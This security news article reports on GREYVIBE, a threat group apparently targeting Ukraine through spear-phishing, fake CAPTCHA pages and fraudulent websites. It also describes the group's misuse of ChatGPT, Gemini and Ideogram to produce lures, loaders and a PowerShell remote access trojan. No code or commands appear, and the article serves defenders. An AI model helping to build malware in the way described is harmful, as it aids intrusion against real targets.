GREYVIBE Hackers Exploit AI Tools to Enhance Cyberattacks
The GREYVIBE hacking group has been actively leveraging advanced artificial intelligence (AI) tools, notably ChatGPT and Google Gemini, to amplify their cyberattack capabilities. Since August 2025, this group has primarily targeted Ukrainian government, military, and civilian sectors, underscoring the increasing integration of AI in cyber warfare.
Identification and Attribution
WithSecure researchers have identified GREYVIBE as a previously untracked threat actor exhibiting consistent patterns in infrastructure, tools, and operational behavior across multiple campaigns. While definitive attribution remains elusive, the group’s activities align closely with Russian state interests, particularly in intelligence gathering related to the Russia-Ukraine conflict. Indicators supporting this alignment include Russian-language artifacts, activity patterns corresponding to Moscow’s time zone, and a focus on Ukrainian institutions.
Tactics and Techniques
GREYVIBE employs a multifaceted attack strategy that combines spear-phishing emails, deceptive CAPTCHA verification pages, and fraudulent websites to distribute malware.
– Spear-Phishing Campaigns: Attackers impersonate Ukrainian government agencies, distributing malicious archives via cloud services like Google Drive. These payloads execute decoy documents while silently initiating infection chains using custom loaders.
– Fake CAPTCHA Pages: Designed to deceive victims into executing malicious commands under the guise of verification steps.
– Deceptive Websites: The group operates fraudulent adult club websites targeting Ukrainian individuals, particularly military personnel. These platforms deliver malware such as FallSpy for Android and PhantomRelay for Windows and engage in social engineering through fake personas on messaging platforms like Telegram.
Integration of AI Tools
A significant aspect of GREYVIBE’s operations is the systematic use of generative AI tools across the attack lifecycle. Tools like ChatGPT, Google Gemini, and Ideogram AI have been utilized to generate phishing lures, develop malware components, and support post-compromise activities.
– AI-Generated Code: Researchers observed AI-generated code patterns in obfuscators and loaders such as DAYLIGHT and TEASOUP, as well as in the development of LegionRelay, a custom PowerShell-based remote access trojan.
– Operational Efficiency: This AI-assisted approach enables the group to compensate for limited technical sophistication while accelerating development cycles. It also reduces reliance on reused code, complicating traditional attribution methods.
Challenges and Vulnerabilities
Despite the advantages, GREYVIBE’s reliance on AI has introduced certain flaws. WithSecure identified design weaknesses in LegionRelay that exposed backend functionality, allowing researchers to monitor attacker activity over time.
Malware Toolkit
GREYVIBE’s malware arsenal includes:
– PhantomRelay: A modular remote access trojan (RAT) that uses WebSockets for command execution.
– FallSpy: An Android malware variant used to compromise mobile devices.
Implications and Recommendations
The integration of AI tools in cyberattacks by groups like GREYVIBE signifies a paradigm shift in cyber warfare tactics. Organizations, especially those in high-risk sectors, must enhance their cybersecurity measures to counteract these sophisticated threats.
– Enhanced Monitoring: Implement advanced monitoring systems capable of detecting AI-generated phishing attempts and malware.
– Employee Training: Conduct regular training sessions to educate employees about the latest phishing tactics and social engineering methods.
– AI Security Measures: Develop and deploy security protocols specifically designed to identify and mitigate AI-assisted cyber threats.
By understanding and addressing the evolving tactics of threat actors like GREYVIBE, organizations can better protect themselves against the next generation of cyber threats.
